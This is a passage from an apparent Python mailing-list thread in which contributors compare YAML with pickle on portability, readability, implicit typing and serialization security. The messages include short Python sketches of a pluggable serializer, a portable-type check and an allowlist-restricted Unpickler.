serious exercise in topology. Brian Ingerson, one of the other
co-authors, was working on something similar to Pickle for Perl.

| At the time, I was looking for a config format, and it wasn't
| *quite* what I wanted, because some of the serialization and XML
| aspects made it slightly clumsy as a config format.

That some people use it for configuration files is due to Brian's
influence on the more-than-one-way-to-write-it. Also, our earlier
goals of a cross-language serialization tool got in the way of
making it a great configuration file language. We've since had to
make some compromises in this regard. Two other good uses for YAML
include log files and test suites, neither of which was the
initial focus, but alas, some things get a life of their own.

| I suspect that people who want to use YAML for serialization,
| or as an XML replacement, may feel the same way. And yet, I don't get
| the feeling that YAML is being developed as a "compromise" format, so
| I am obviously missing a key design principle.

I work with business documents all the time; especially ones that
move between computer systems using different programming languages.
So, this was my primary goal; we advertise YAML as a serialization
language since this is the 'easiest category' to put ourselves in.

| As regards the existing YAML libraries for Python, when I looked I
| found that the PyYAML website claimed that it was out of date with
| respect to the latest spec. I also tried SYCK, which looks OK, but
| which I did manage to provoke a crash from without trying too hard.

Er ya. Don't do "syck.parse", I need to remove that function from
the public interface. The newest release of Syck is far more stable
so you may want to try it again.

| None of this is a criticism of YAML and/or its libraries themselves.
| However, it does make any suggestion that YAML be used to replace a
| key part of the Python standard library seem a little premature, at
| least.

Definitely. YAML has at least two more years of work before it'd be
ready for even proposing that it be considered as a core library.

| I just re-read some of the YAML website. It appears clear from there
| that YAML is designed as a serialization format. But there seems to
| be a lack of justification as to *why* the design goals (section 1.1
| of the spec) are important. Also, security is *not* an explicit goal,
| and section 3.1.6 (the "Construct" process) is completely lacking in
| any discussion of the security or other implications of converting a
| YAML file to a native language object. This seems somewhat surprising
| in a specification for a serialization format...

*nods* I hope the discussion above helps. I doubt that YAML would
ever be a good 'drop-in' replacement for pickle. If in the far-distant
future someone were to propose using YAML in this way, it'd probably be
one of N 'formats' for a more pluggable pickle module.
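
For what it's worth, the "one of N formats" idea could look roughly like the sketch below. This is purely hypothetical: the registry, `register_format`, and the `fmt` argument are made-up names, not an existing or proposed standard library API, and JSON stands in for a text format only because it ships with Python.

```python
import json
import pickle

# Hypothetical registry: format name -> (dumps, loads) pair.
FORMATS = {
    "pickle": (pickle.dumps, pickle.loads),
    "json": (
        lambda obj: json.dumps(obj).encode("utf-8"),
        lambda data: json.loads(data.decode("utf-8")),
    ),
}

def register_format(name, dumps_func, loads_func):
    """Plug in another wire format, e.g. a YAML emitter/loader pair."""
    FORMATS[name] = (dumps_func, loads_func)

def dumps(obj, fmt="pickle"):
    """Serialize obj to bytes using the named format."""
    return FORMATS[fmt][0](obj)

def loads(data, fmt="pickle"):
    """Rebuild an object from bytes using the named format."""
    return FORMATS[fmt][1](data)

# The same plain data round-trips through either registered format.
invoice = {"id": 17, "lines": [{"sku": "A1", "qty": 2}]}
for name in ("pickle", "json"):
    assert loads(dumps(invoice, name), name) == invoice
```

A YAML implementation would be registered the same way once one is mature enough, and callers would pick the format per use rather than replacing pickle outright.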

| More portable - hmm, OK. I'm not sure where you want portability
| *between*, though. Pickle is, as far as I know, portable across
| platforms. Are you talking about portability between languages? I
| can't think where I'd want to dump a Python object for loading into
| Perl or Ruby, though. Can you offer me some real-life use cases?

Certainly. I work with several programmers in different shops,
we move transactional documents around, traditionally with XML,
but more so with YAML. By this time next year I hope it is all
YAML. If you are just using hash/list/scalar data types (90%
of our use cases) then YAML is a great option. In fact, recently
we had a customer start using the Perl version of YAML with our
system and it worked.
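
As a rough illustration of what "just hash/list/scalar" means on the Python side, here is a minimal sketch of a check for that subset. The helper name `is_portable` is made up for this example, and requiring string keys is my own assumption about what travels well between Python, Perl and Ruby.

```python
# Scalar types that map cleanly onto most languages' native types.
SCALARS = (str, int, float, bool, type(None))

def is_portable(value):
    """Return True if value is built only from dicts, lists and scalars."""
    if isinstance(value, SCALARS):
        return True
    if isinstance(value, list):
        return all(is_portable(item) for item in value)
    if isinstance(value, dict):
        # Assumption: mapping keys are restricted to strings.
        return all(
            isinstance(key, str) and is_portable(item)
            for key, item in value.items()
        )
    return False  # class instances, tuples, sets and so on

order = {"customer": "ACME", "lines": [{"qty": 2, "price": 9.5}]}
assert is_portable(order)
assert not is_portable({"handler": object()})
```

Data that passes a check like this needs no class information on the receiving side, which is why it moves between languages without trouble.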

| More readable - I'll give you this. And yes, it can be useful. I've
| been stuffed before now with Java programs whose configuration is
| stored as a serialized-to-disk object which is completely opaque to
| external tools, let alone human readers. But this is a property that
| is useful only in case of failure (if the config gets stuffed, I can
| hand-hack the dump file, or if I forget what I set parameter X to, I
| can look in the dump). If the application design *requires* the dump
| format to be readable, we've moved away from serialization, and
| started to talk about configuration formats (which is a separate
| issue, one in which it is quite possible that YAML is strong, but
| *not* one in which it is competing with Pickle).

Exactly. The older PyYaml made configuration files painful, as it
was trying to implicitly type all kinds of data (recognizing floating
points, dates, etc.). We found this behavior to be a bit
counter-productive for config files, and hence this "implicit
typing" is now strictly optional, application directed behavior.
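
To make the problem concrete, here is a small sketch of what application-directed implicit typing might look like. It is not PyYaml's actual code; `resolve_scalar` and its `implicit` flag are hypothetical names, and the patterns cover only simple integers, decimals and ISO dates.

```python
import datetime
import re

_INT = re.compile(r"[-+]?[0-9]+")
_FLOAT = re.compile(r"[-+]?[0-9]+\.[0-9]+")
_DATE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")

def resolve_scalar(text, implicit=False):
    """Return text unchanged unless the application asks for implicit typing."""
    if not implicit:
        return text
    if _INT.fullmatch(text):
        return int(text)
    if _FLOAT.fullmatch(text):
        return float(text)
    if _DATE.fullmatch(text):
        try:
            return datetime.date.fromisoformat(text)
        except ValueError:
            return text  # looks like a date but is not a valid one
    return text

# A version string in a config file shows why implicit typing can hurt.
assert resolve_scalar("1.10") == "1.10"
assert resolve_scalar("1.10", implicit=True) == 1.1
assert resolve_scalar("2004-09-19", implicit=True) == datetime.date(2004, 9, 19)
```

With typing switched off, a config value such as a version number stays the string the author wrote; with it on, the trailing zero is silently lost.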

Best,

Clark
 
Paul Moore

[large snip of points already covered far better than I could by
Andrew Dalke...]

> Fair enough. I didn't mean to imply that the current YAML
> implementations were drop-in replacements for Pickle, only that the
> concept of YAML deserves more attention.

I'd say that the "concept" of YAML (in isolation) isn't particularly
clear. I certainly can't discern from the documentation on the
website what it is.

> Well, if the concept of serialization is indeed inherently insecure,
> what could they possibly do?

I dunno. First, is serialisation inherently insecure? If YAML is all
about serialisation, then one of the key points in its documentation
should be either (a) "YAML focuses on providing a secure
serialisation format" or (b) "serialisation is inherently insecure,
for the following reasons - X, Y, Z - and so YAML cannot provide
secure serialisation. These are issues you have to consider when
using YAML..."

> In order for YAML to directly address security, it would have to
> concern itself with the "meaning" of the data being serialized,
> which seems outside the scope of YAML's purpose.

How do you work that out? I can't find a concrete enough statement of
YAML's purpose to allow me to make a categorical statement like that.

> Serialization security seems generally assigned as a responsibility
> of the user, who is usually in the best position to gauge their
> data's effects. The best a serialization format can do is ensure
> data reconstruction within the bounds described by the user.

As I say, most of this should be in the YAML documentation. I'll be
charitable and assume that it's just something that hasn't been
written up yet, but that section in the spec that I quoted looks
pretty explicit in its vagueness :)
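
For the pickle side of the comparison, "reconstruction within the bounds described by the user" can at least be sketched by overriding `pickle.Unpickler.find_class`, which the pickle module consults whenever a stream asks for a class or function by name. The `AllowlistUnpickler` class and `restricted_loads` helper below are illustrative names of my own, and the sketch only limits which globals may be looked up; it does not make untrusted pickles safe in general.

```python
import datetime
import io
import pickle

class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that only resolves (module, name) pairs the caller allows."""

    def __init__(self, file, allowed):
        super().__init__(file)
        self._allowed = set(allowed)

    def find_class(self, module, name):
        # Called for every global the pickle stream wants to import.
        if (module, name) not in self._allowed:
            raise pickle.UnpicklingError(f"{module}.{name} is not allowed")
        return super().find_class(module, name)

def restricted_loads(data, allowed=()):
    """Load pickled bytes, refusing any class outside the allowlist."""
    return AllowlistUnpickler(io.BytesIO(data), allowed).load()

# Plain containers need no class lookup, so they load with an empty allowlist.
assert restricted_loads(pickle.dumps({"a": [1, 2]})) == {"a": [1, 2]}

# A date needs datetime.date, so the caller has to permit it explicitly.
blob = pickle.dumps(datetime.date(2004, 9, 19))
allowed = [("datetime", "date")]
assert restricted_loads(blob, allowed) == datetime.date(2004, 9, 19)
```

Without the allowlist entry, the second load raises `pickle.UnpicklingError`. The point is that the bounds come from the caller, not from the data, which is the kind of statement I'd expect a serialisation spec to make one way or the other.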

Paul
 
